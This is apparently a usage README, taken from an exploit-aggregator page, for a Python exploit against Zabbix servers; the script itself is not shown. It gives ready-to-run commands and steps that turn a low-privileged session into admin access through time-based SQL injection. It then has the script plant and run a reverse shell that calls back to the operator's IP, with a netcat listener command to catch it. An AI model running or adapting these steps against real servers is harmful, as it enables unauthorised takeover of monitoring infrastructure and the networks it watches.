Share
## https://sploitus.com/exploit?id=EF75AA1C-BE50-525C-B746-969CA317DC82
# Usage

```bash
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
```

### Example Scenario
You have identified a Zabbix server running on IP `192.168.1.100`, and you have access to a low-privileged user with the following details:
- Session ID (`sid`): `d82bf6715e1d3c1f25`
- Host ID (`hostid`): `10107`
- PHP session ID (`phpsessid`): `a4g7f48d9j3r7h8s9g`

You want to exploit the RCE vulnerability using this script.

### Running the Script

```bash
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
```

### Parameters Explanation:
- `--ip 192.168.1.100`: The IP address of the Zabbix server.
- `--sid d82bf6715e1d3c1f25`: The session ID of a low-privileged user.
- `--hostid 10107`: The ID of a host that the low-privileged user can access.
- `--phpsessid a4g7f48d9j3r7h8s9g`: The PHP session ID used to authenticate requests.
- `--false_time 1`: Time in seconds to sleep in case of a wrong guess during the SQL injection (default is 1 second).
- `--true_time 3`: Time in seconds to sleep in case of a correct guess during the SQL injection (default is 3 seconds).

### What Happens Next:
1. The script will start by attempting to extract the admin session ID using a time-based SQL injection.
2. Once the admin session ID is obtained, the script will create a reverse shell script on the Zabbix server.
3. Finally, the script will execute the reverse shell, connecting back to your machine on the specified IP and port (`10.0.46.27:5555` in the script).

### Notes:
- Make sure that your machine is listening on the specified port (`5555` in the script) to catch the reverse shell. You can use `netcat` for this:

  ```bash
  nc -lvnp 5555
  ```

- Replace the IP `10.0.46.27` and port `5555` in the `CreateScript` function with your own IP and desired port to receive the reverse shell.